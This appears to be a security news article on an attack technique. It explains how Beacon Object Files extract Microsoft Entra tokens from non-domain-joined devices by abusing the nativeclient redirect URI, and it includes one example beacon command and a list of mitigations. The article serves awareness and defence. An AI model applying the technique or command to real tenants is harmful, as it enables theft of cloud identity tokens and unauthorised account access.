New Exploit Method Extracts Microsoft Entra Tokens Through Beacon

A novel exploit method leveraging Beacon Object Files (BOFs) has emerged, enabling attackers to extract Microsoft Entra (formerly Azure AD) tokens from compromised endpoints, even on non-domain-joined or BYOD devices.

This technique sidesteps traditional detection mechanisms and expands access to high-value targets, posing significant risks to enterprise cloud environments.

PRT Extraction Limits on BYOD Devices

Attackers often rely on extracting Primary Refresh Tokens (PRTs) from domain-joined devices to maintain access to Entra tenants.

However, as detailed in Matthew Creel’s “Operator’s Guide to Device-Joined Hosts and the PRT Cookie,” PRT-based methods fail on non-domain-joined hosts.

In such cases, attackers faced a roadblock: how to obtain refresh tokens without triggering alerts or requiring privileged access.

TrustedSec’s recently released get_azure_token BOF (by Christopher Paschen) inspired a breakthrough.

The tool initiates an Entra authorization code flow via the victim’s browser, captures the authorization code via a local listener, and exchanges it for tokens.

However, its reliance on http://localhost as a redirect URI limited targets to three FOCI-enabled apps: Azure CLI, Azure PowerShell, and Visual Studio Legacy.

Researchers discovered that repurposing Microsoft’s native client redirect URI (https://login.microsoftonline.com/common/oauth2/nativeclient) bypasses the localhost restriction. This URI, designed for desktop/mobile apps, allows attackers to:

1. Target high-value FOCI apps like Microsoft Teams, Copilot, and Edge.
2. Extract authorization codes from browser window titles using the GetWindowTextA API.
3. Exchange codes for tokens without relying on easily monitored localhost redirects.

Technical Breakdown: How the Exploit Works

1. BOF Execution: The attacker’s Beacon sends a command to launch a browser with a crafted Entra authcode URL.
2. Code Capture: After the victim authenticates, the authorization code appears in the browser’s window title.
3. Token Exchange: The BOF extracts the code and requests access/refresh tokens, which are exfiltrated to the attacker.

Example Command:

beacon> entra-authcode-flow 1fec8e78-bce4-4a03-aa91-5d88d2d7a83b “User.Read”

(Uses Microsoft Teams’ client ID for stealth)

Mitigation Recommendations

1. Monitor Token Requests: Flag authcode flows for non-standard client IDs (e.g., Teams tokens issued to non-Teams processes).
2. Restrict FOCI Consent: Audit and limit third-party app consent in Entra ID.
3. User Training: Educate employees on phishing risks, as the attack requires initial browser access.
4. Conditional Access: Enforce device compliance policies for sensitive apps.

This technique highlights the growing sophistication of adversary-in-the-middle (AiTM) attacks against cloud identities.

As JUMPSEC’s TokenSmith and TrustedSec’s tools gain traction, defenders must prioritize monitoring native OAuth flows and hardening Entra configurations.

The proof-of-concept BOF and analysis are available on GitHub, underscoring the urgency for proactive defense measures.

Setting Up SOC Team? – Download Free Ultimate SIEM Pricing Guide (PDF) For Your SOC Team -> Free Download